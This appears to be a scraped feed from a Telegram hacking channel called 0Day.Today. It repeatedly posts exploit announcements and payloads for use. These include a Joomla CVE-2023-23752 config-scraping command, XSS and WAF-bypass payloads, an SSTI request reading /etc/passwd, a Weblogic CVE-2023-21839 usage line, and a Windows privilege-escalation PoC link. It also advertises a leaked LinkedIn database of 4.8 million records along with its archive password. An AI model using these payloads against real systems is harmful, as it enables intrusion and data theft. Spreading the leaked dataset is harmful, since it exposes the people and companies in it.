This media is not supported in your browser
VIEW IN TELEGRAM
LPE via StorSvc
Windows Local Privilege Escalation via StorSvc service (writable SYSTEM path DLL Hijacking)
Github
#POC #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
Windows Local Privilege Escalation via StorSvc service (writable SYSTEM path DLL Hijacking)
Github
#POC #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
🤝2
این آخرین باری هست که اینترنت اکسپلورر رو میبینید، مایکروسافت امروز آپدیتی برای حذفش منتشر میکنه . 🖤
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
🫡13😢7👌2❤1👍1👏1🎉1
Unusual 403 Bypass to a full website takeover
Read Here
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Read Here
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3👍1
reNgine 🔥
The only web application recon tool you will ever need!
Github
#Osint #Recon #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
The only web application recon tool you will ever need!
Github
#Osint #Recon #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4❤🔥1
CVE-2023-23752
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints
severity: high 🆘
Github
#CVE #Joomla
——————
0Day.Today
@LearnExploit
@Tech_Army
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints
severity: high 🆘
Github
#CVE #Joomla
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-23752 An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints severity: high 🆘 Github #CVE #Joomla —————— 0Day.Today @LearnExploit @Tech_Army
CVE-2023-23752 ( PoC )
Joomla webservice endpoint access
#CVE #Joomla #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
Joomla webservice endpoint access
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
#CVE #Joomla #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3✍2🤝1
Cloudflare bypass & template injection to XSS in one shoot
#cloudflare #bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
#cloudflare #bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
✍4
آموزش نصب Metasploit روی ویندوز
Metasploit
#metasploit #exploit #windows
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Metasploit
#metasploit #exploit #windows
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4✍1👍1
Akamai WAF bypass through right-click
<details onauxclick=confirm`xss`></details>
#Waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<details onauxclick=confirm`xss`></details>
#Waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡2❤2
SSTI to RCE:
#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
curl -X POST http://test.com:8080 -H "Cookie: token=eyJhbGciOiJI5cCI6Ikp.eyJ1c2VybmFtZSI6IndpemFyZC5vn0.YuW5qoU_-3FQ6q5wyFPw3PFlDHDOjuu2k" --data "name=name&desc={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}"
#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥5👍1
بزنید حال کنین
——————
0Day.Today
@LearnExploit
@Tech_Army
vmess://ewogICJ2IjogIjIiLAogICJwcyI6ICJATGVhcm5leHBsb2l0IiwKICAiYWRkIjogIjU0LjM4Ljk5LjI1MyIsCiAgInBvcnQiOiAzNjg4MSwKICAiaWQiOiAiM2I5MzJmYjYtYmU4ZS00NjM0LTk5MDUtMjNjNTVkZTM2NWZjIiwKICAiYWlkIjogMCwKICAibmV0IjogIndzIiwKICAidHlwZSI6ICJub25lIiwKICAiaG9zdCI6ICIiLAogICJwYXRoIjogIi8iLAogICJ0bHMiOiAibm9uZSIKfQ==
——————
0Day.Today
@LearnExploit
@Tech_Army
❤5
Weblogic-CVE-2023-21839
نسخه های آسیب پذیر :
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
Github
Usage :
——————
0Day.Today
@LearnExploit
@Tech_Army
نسخه های آسیب پذیر :
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
Github
Usage :
java -jar target ip: port ldap address
#CVE ——————
0Day.Today
@LearnExploit
@Tech_Army
✍3⚡1👍1👨💻1
Linkedin_sql.7z
123.2 MB
4.8M LinkedIn Profile Company Details With Below Data
——————
0Day.Today
@LearnExploit
@Tech_Army
id , company_url_domain , company_name , country , industry , linkedin_url , total_employee_estimate , year_foundedPassword:
weleakdatabase
#linkedin #leak——————
0Day.Today
@LearnExploit
@Tech_Army
👍2🔥2❤1❤🔥1